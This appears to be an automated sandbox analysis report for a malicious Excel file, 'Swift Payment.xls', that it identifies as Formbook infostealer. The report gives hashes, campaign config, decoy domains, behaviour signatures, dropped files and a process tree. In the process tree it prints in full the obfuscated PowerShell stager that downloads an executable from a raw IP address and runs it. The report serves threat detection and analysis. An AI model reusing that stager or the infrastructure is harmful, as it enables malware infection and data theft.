Resubmissions

12-09-2024 13:46

240912-q3ecpsxbqa 3

29-08-2024 14:14

240829-rkar8swbpf 10

Analysis

  • max time kernel
    149s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    29-08-2024 14:14

General

  • Target

    Swift Payment.xls

  • Size

    537KB

  • MD5

    3ddbb73564bd5da178d353887cb82cf1

  • SHA1

    9e7cfbac422ef392dff72228be57a86f37eed26a

  • SHA256

    eaf3b9c1bdaf72da0a5d2a1a8c4f128712463c558e8af23830126bf07ef63847

  • SHA512

    c4cc01cc620b8f5cf457221679760f5a36e32cf1d2fa42f3a30bac8949bd152ab0097e2ce02da70111533b0b21c43a71200aba97362c0270623a56a2b1d44d0e

  • SSDEEP

    12288:pNsZ4UeZzxvJLrl0jHUxIbuKlt70AFg7JzXAZo+r:s2xxJIUgL0AGkb

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

b48n

Decoy

anifestmindset.net

ommybahamabigsales.shop

3tcxr.xyz

iano-world.net

rconf23.net

atherpa.shop

trllrpartners.club

5sawit777.pro

ctbhuxcdreioijresol.top

opinatlas.app

pinstar.xyz

mfengwa.top

8games13.xyz

tickpaket.online

iphuodongallbbtbtm.top

ental-bridges-51593.bond

laywithkemon.rest

lkpiou.xyz

a88.land

igfloppafan.club

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1208
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"
      2⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2276
    • C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\SysWOW64\explorer.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\MEmpEng.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:324
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'JEJqY0QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSREVmaU5JVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1dUTnVqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbU5Xd3hBVWtuVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE9lVEpqQ056LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZLKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3THRQQktOTnlLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpVTkcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQmpjRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNTU1L01FbXBFbmcuZXhlIiwiJEVOdjpBUFBEQVRBXE1FbXBFbmcuZXhlIiwwLDApO3N0YVJ0LXNsRWVwKDMpO1NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcTUVtcEVuZy5leGUi'+[cHAR]34+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:820
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'JEJqY0QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSREVmaU5JVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1dUTnVqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbU5Xd3hBVWtuVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE9lVEpqQ056LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZLKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3THRQQktOTnlLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpVTkcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQmpjRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNTU1L01FbXBFbmcuZXhlIiwiJEVOdjpBUFBEQVRBXE1FbXBFbmcuZXhlIiwwLDApO3N0YVJ0LXNsRWVwKDMpO1NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcTUVtcEVuZy5leGUi'+[cHAR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1860
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m9glxv2r.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1944
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCEC5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCEC4.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1184
        • C:\Users\Admin\AppData\Roaming\MEmpEng.exe
          "C:\Users\Admin\AppData\Roaming\MEmpEng.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1984
          • C:\Users\Admin\AppData\Roaming\MEmpEng.exe
            "C:\Users\Admin\AppData\Roaming\MEmpEng.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:2460

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

    Filesize

    344B

    MD5

    2a22d79f810194591562f5550fd2fdaf

    SHA1

    9085f1492a5bcc3f539169ebd82cbe8ead4f4eec

    SHA256

    d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1

    SHA512

    281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    603c5da8c0b5fe7205a5f3e72cec9482

    SHA1

    2d323cfc3f157f4f77adfea98fdf3d8494f87d27

    SHA256

    e6d873379836293e2df10f1444e76516b7891b092c1be540c2a1e820b2d62d13

    SHA512

    6adc8a4f80fc294aba1d4515f5e43a6acc3e4eedaa6785b3fcaf582ee3baee6e4692a2eb67f961801b74e4055c572e47a54f4530c6dd40bea6b7578bccdbaafb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

    Filesize

    544B

    MD5

    759ed84c7a10931413e9616b819989c3

    SHA1

    da0f62501a26f2afe09105b250292eab898e3062

    SHA256

    c9878b853d06d37df8f1cba52b3ed4575ba683e38bd16f42062bf372efe0e8dc

    SHA512

    95e8a240a468a5f8497acf279b337f888d33f2f8ac334502b3fe5ddfbc13e2cbf23a727a3a7137bed187c23199b6d6a9fba2f355c7300dd39dc63dd21af75797

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WNZH54VQ\IEnetstateIntenet[1].hta

    Filesize

    4KB

    MD5

    1c08a8e3980fc2229abeea76dbf6d328

    SHA1

    189b2caf360cc40757ae8897aa4be78d465d0b3b

    SHA256

    b39a46724746ba0ff1f4c6a596a643c4281bc171adbdb269baa42e6f68cf395c

    SHA512

    8023ff2f97287f0069b6074dbaf412095cd8670e8baed8f961feec2f3be654bc6230b95a09777847c77496ff3ea2ac1ddf5b5fbb394b99e1186c0a899bc78e87

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA663E76.emf

    Filesize

    4.3MB

    MD5

    8a188a6917ad1fa0c7f1aa20a63c8593

    SHA1

    4d2270d647d4a3680b47e85501c7ab1442ddcbb2

    SHA256

    728a3d9b1bee7cd8baa90aa0b1a4805a93238c8f835ea685931ac676ba7ef3e3

    SHA512

    823246cac3d8a45980ce0623c485fb0b74ce7aa68cca37b22fef1924685f1201298163c398688057736ec4551999b5455db1c97abc7da97e5a07589cd4fd7cdf

  • C:\Users\Admin\AppData\Local\Temp\CabABAA.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESCEC5.tmp

    Filesize

    1KB

    MD5

    5069aec363046127f78dc287be7782fa

    SHA1

    1b553469f665d84707400792b22c97d49cce710d

    SHA256

    1189418bbdc7d61743e20ffd41eac8d074a13c95d50bd010ac21c701c92e8397

    SHA512

    4463de2dba36af3e9a7ae2222ebc4b71e8da094cc50a24b6da2c364ac14f5d6a93a53169146e6e64edba8907ca4744b7c7fe538b6fca5afcdc054084ce990c4c

  • C:\Users\Admin\AppData\Local\Temp\m9glxv2r.dll

    Filesize

    3KB

    MD5

    91a571987480a1d92b545097ee28c4b4

    SHA1

    5b2751371aa3097686cb02a1de18d9d188ff939b

    SHA256

    0fbd19ab7049a34a1b28225580f4c17bb693632d0cd24b6a23341f3b8bb466ea

    SHA512

    da321bec27ffc01af1684c9ae4e8f9acbc59c66df268b03afd2185b88185701870f5571cc237d769386e1d78905b370b439f361b6389a318480914aa13738a68

  • C:\Users\Admin\AppData\Local\Temp\m9glxv2r.pdb

    Filesize

    7KB

    MD5

    2195048dd458b08c3623987a45b265b6

    SHA1

    ce3d4c259a83c180575d84ceb3292d237ab6e552

    SHA256

    3956932ff549efc73b8b29a6900c2c786ea6bfb94cd6d72caba7bf8c0e473e07

    SHA512

    c64f75930525fc80f917bb72eecc57d6cdae6db31345653bcd49a4b644b1b24f57db847d3471198f95cf29ac392f9cbb058acbf28ed2ef9596de6d9ba59eb637

  • C:\Users\Admin\AppData\Roaming\MEmpEng.exe

    Filesize

    604KB

    MD5

    dd2e0becfb1316c49975386fc3367c45

    SHA1

    98c578ff997ef781919ca5967251fa9d462a756e

    SHA256

    14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628

    SHA512

    4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCCEC4.tmp

    Filesize

    652B

    MD5

    a605be4920833aecd90fa003dd64909e

    SHA1

    7484f03596b48cbb168f1d6137f96061bde71362

    SHA256

    b1fe652d82d900482e59066ecfdb63cf8e64bb59ebe82ad4e223a0cc180dca42

    SHA512

    32d1fb29e959a1efa6616f401b880bf3483bb7df92f20384d58fa07bca8436501c42f072e6e5a05113000c750c4d8e7a6524c14cdd67d42589b58c05339de803

  • \??\c:\Users\Admin\AppData\Local\Temp\m9glxv2r.0.cs

    Filesize

    469B

    MD5

    ea113715d78eb5483c3507b3cbaebc06

    SHA1

    daa1297b0545649dd504537c2810082ef4156c32

    SHA256

    812d03a581b330a9d0dc751fc29857600c7a6988b748fb5c091850c2ac1e0a7d

    SHA512

    3595451c9eccd0fda379e6d906f45c87b90f52e0c70b609145ec037127fb72001b8f38697ff497806bc20cbecbc0c29d3565db15cc08a4f420d97e65b1aaa051

  • \??\c:\Users\Admin\AppData\Local\Temp\m9glxv2r.cmdline

    Filesize

    309B

    MD5

    d77938b87970b7fbfe88933c798068cb

    SHA1

    5af4971a41e26df349b470c22274bae321332768

    SHA256

    521548261d079fc88630d5a37d6b40ef8e8104caf2c195906debf1e3b1f43871

    SHA512

    9f23e77336702647a7f56fd85650bc9f675a4200d3d953abd290ead600b413db81d2ef406d621d181153250d73b1b8f3ed0ef9cb4214e5da52670004cb293f3a

  • memory/1208-81-0x0000000006EC0000-0x0000000006FCB000-memory.dmp

    Filesize

    1.0MB

  • memory/1984-65-0x0000000000D40000-0x0000000000DDC000-memory.dmp

    Filesize

    624KB

  • memory/1984-66-0x0000000000D20000-0x0000000000D38000-memory.dmp

    Filesize

    96KB

  • memory/1984-67-0x0000000004890000-0x0000000004906000-memory.dmp

    Filesize

    472KB

  • memory/2276-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2276-34-0x0000000071FED000-0x0000000071FF8000-memory.dmp

    Filesize

    44KB

  • memory/2276-20-0x0000000002420000-0x0000000002422000-memory.dmp

    Filesize

    8KB

  • memory/2276-89-0x0000000071FED000-0x0000000071FF8000-memory.dmp

    Filesize

    44KB

  • memory/2276-1-0x0000000071FED000-0x0000000071FF8000-memory.dmp

    Filesize

    44KB

  • memory/2276-86-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2460-68-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/2460-73-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/2460-70-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/2460-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2688-19-0x00000000025B0000-0x00000000025B2000-memory.dmp

    Filesize

    8KB

  • memory/2844-76-0x0000000000090000-0x0000000000311000-memory.dmp

    Filesize

    2.5MB

  • memory/2844-77-0x0000000000320000-0x000000000034F000-memory.dmp

    Filesize

    188KB